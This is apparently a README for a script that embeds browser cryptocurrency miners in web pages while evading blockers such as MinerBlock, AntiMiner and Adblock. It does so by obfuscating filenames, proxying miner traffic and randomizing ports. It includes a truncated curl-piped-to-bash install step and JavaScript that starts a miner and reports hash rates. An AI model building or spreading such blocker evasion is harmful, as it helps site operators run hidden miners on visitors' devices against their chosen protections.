This script attempts to bypass extensions or network blocks that prevent the use of online cryptocurrency miners.
- MinerBlock
- AntiMiner
- Adblock (all lists enabled)
- Adblock Plus
- 100% success rate
- Obfuscates filenames per server
- Automatically creates proxy (using coin-hive-stratum)
- Random port
- Interactive setup
First, make sure you have Node.js installed:
Navigate to your server's scripts directory and run
bash <(curl -s
Then, add the script tag that the file generates to every HTML file you want to be protected. That's it!
Not implemented yet (you can use cygwin for now)
Call loadCryptominer, which will return a miner, and will return a value 0 to 4 referring to whether or not it worked.
0 - Remote coinhive
1 - Local coinhive with proxy
2 - Authedmine
3 - Crypto-loot
4 - Cloudcoins
5 - All blocked
6 - Script not blocked, but failure creating miner instance
loadCryptominer(function(miner, status) {
//Code that mines
//For example:
if (status == 5 || status == 6) {
console.log("TEST FAILED!")
} else {
// Update stats once per second
setInterval(function() {
var hashesPerSecond = miner.getHashesPerSecond();
var totalHashes = miner.getTotalHashes();
var acceptedHashes = miner.getAcceptedHashes();
console.log(hashesPerSecond, totalHashes, acceptedHashes)
}, 1000);
If you appreciate this project, feel free to send me PayPal money at:
- Run proxy over port 80 or 443
- Obfuscate miner code